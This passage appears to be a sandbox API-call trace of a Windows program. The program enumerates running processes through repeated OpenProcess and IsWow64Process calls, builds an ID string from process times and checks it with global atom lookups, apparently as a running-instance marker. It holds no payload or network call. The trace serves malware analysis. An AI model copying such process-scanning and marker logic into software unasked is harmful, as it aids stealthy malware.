	[0106.458] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.458] CloseHandle (hObject=0x694) returned 1
	[0106.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.459] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.459] CloseHandle (hObject=0x694) returned 1
	[0106.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.459] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.459] CloseHandle (hObject=0x694) returned 1
	[0106.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.459] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.459] CloseHandle (hObject=0x694) returned 1
	[0106.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.459] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.459] CloseHandle (hObject=0x694) returned 1
	[0106.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.459] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.460] CloseHandle (hObject=0x694) returned 1
	[0106.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.460] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.460] CloseHandle (hObject=0x694) returned 1
	[0106.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.460] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.460] CloseHandle (hObject=0x694) returned 1
	[0106.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.460] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.460] CloseHandle (hObject=0x694) returned 1
	[0106.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.460] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.460] CloseHandle (hObject=0x694) returned 1
	[0106.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.461] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.461] CloseHandle (hObject=0x694) returned 1
	[0106.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.461] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.461] CloseHandle (hObject=0x694) returned 1
	[0106.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.461] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.461] CloseHandle (hObject=0x694) returned 1
	[0106.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.461] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.461] CloseHandle (hObject=0x694) returned 1
	[0106.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.461] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.461] CloseHandle (hObject=0x694) returned 1
	[0106.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.462] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.462] CloseHandle (hObject=0x694) returned 1
	[0106.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.462] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.462] CloseHandle (hObject=0x694) returned 1
	[0106.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.462] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.462] CloseHandle (hObject=0x694) returned 1
	[0106.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.462] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.462] CloseHandle (hObject=0x694) returned 1
	[0106.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.462] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.462] CloseHandle (hObject=0x694) returned 1
	[0106.463] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.463] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.463] CloseHandle (hObject=0x694) returned 1
	[0106.463] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.463] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.463] CloseHandle (hObject=0x694) returned 1
	[0106.463] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.463] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.463] CloseHandle (hObject=0x694) returned 1
	[0106.463] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.463] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.463] CloseHandle (hObject=0x694) returned 1
	[0106.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.464] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.464] CloseHandle (hObject=0x694) returned 1
	[0106.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.464] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.464] CloseHandle (hObject=0x694) returned 1
	[0106.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.464] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.464] CloseHandle (hObject=0x694) returned 1
	[0106.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.464] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.464] CloseHandle (hObject=0x694) returned 1
	[0106.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.465] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.465] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.465] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.465] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.465] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.466] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.466] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.466] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.466] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.466] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.466] CloseHandle (hObject=0x694) returned 1
	[0106.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.466] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.466] CloseHandle (hObject=0x694) returned 1
	[0106.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.467] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.467] CloseHandle (hObject=0x694) returned 1
	[0106.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.467] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.467] CloseHandle (hObject=0x694) returned 1
	[0106.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.511] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.511] CloseHandle (hObject=0x694) returned 1
	[0106.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.512] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.512] CloseHandle (hObject=0x694) returned 1
	[0106.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.512] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.512] CloseHandle (hObject=0x694) returned 1
	[0106.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.512] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.512] CloseHandle (hObject=0x694) returned 1
	[0106.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.512] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.512] CloseHandle (hObject=0x694) returned 1
	[0106.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.513] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.513] CloseHandle (hObject=0x694) returned 1
	[0106.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.513] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.513] CloseHandle (hObject=0x694) returned 1
	[0106.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.513] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.513] CloseHandle (hObject=0x694) returned 1
	[0106.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.513] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.513] CloseHandle (hObject=0x694) returned 1
	[0106.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.514] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.514] CloseHandle (hObject=0x694) returned 1
	[0106.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.514] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.514] CloseHandle (hObject=0x694) returned 1
	[0106.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.514] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.514] CloseHandle (hObject=0x694) returned 1
	[0106.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.514] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.514] CloseHandle (hObject=0x694) returned 1
	[0106.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.514] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.514] CloseHandle (hObject=0x694) returned 1
	[0106.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.515] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.515] CloseHandle (hObject=0x694) returned 1
	[0106.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.515] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.515] CloseHandle (hObject=0x694) returned 1
	[0106.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.515] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.515] CloseHandle (hObject=0x694) returned 1
	[0106.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.515] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.515] CloseHandle (hObject=0x694) returned 1
	[0106.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.515] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.515] CloseHandle (hObject=0x694) returned 1
	[0106.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.516] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.516] CloseHandle (hObject=0x694) returned 1
	[0106.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.516] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.516] CloseHandle (hObject=0x694) returned 1
	[0106.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.516] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.516] CloseHandle (hObject=0x694) returned 1
	[0106.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.516] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.516] CloseHandle (hObject=0x694) returned 1
	[0106.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.516] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.516] CloseHandle (hObject=0x694) returned 1
	[0106.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.517] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.517] CloseHandle (hObject=0x694) returned 1
	[0106.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.517] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.517] CloseHandle (hObject=0x694) returned 1
	[0106.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.517] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.517] CloseHandle (hObject=0x694) returned 1
	[0106.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.517] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.517] CloseHandle (hObject=0x694) returned 1
	[0106.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.517] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.518] CloseHandle (hObject=0x694) returned 1
	[0106.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.518] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.518] CloseHandle (hObject=0x694) returned 1
	[0106.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.518] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.518] CloseHandle (hObject=0x694) returned 1
	[0106.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.518] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.519] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.519] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.519] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.519] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.519] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.520] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.520] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.520] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.520] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.520] CloseHandle (hObject=0x694) returned 1
	[0106.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.520] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.520] CloseHandle (hObject=0x694) returned 1
	[0106.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.520] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.520] CloseHandle (hObject=0x694) returned 1
	[0106.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.521] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.521] CloseHandle (hObject=0x694) returned 1
	[0106.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.559] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.559] CloseHandle (hObject=0x694) returned 1
	[0106.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.560] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.560] CloseHandle (hObject=0x694) returned 1
	[0106.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.560] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.560] CloseHandle (hObject=0x694) returned 1
	[0106.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.560] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.560] CloseHandle (hObject=0x694) returned 1
	[0106.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.560] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.560] CloseHandle (hObject=0x694) returned 1
	[0106.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.561] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.561] CloseHandle (hObject=0x694) returned 1
	[0106.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.561] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.561] CloseHandle (hObject=0x694) returned 1
	[0106.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.561] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.561] CloseHandle (hObject=0x694) returned 1
	[0106.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.561] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.561] CloseHandle (hObject=0x694) returned 1
	[0106.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.562] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.562] CloseHandle (hObject=0x694) returned 1
	[0106.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
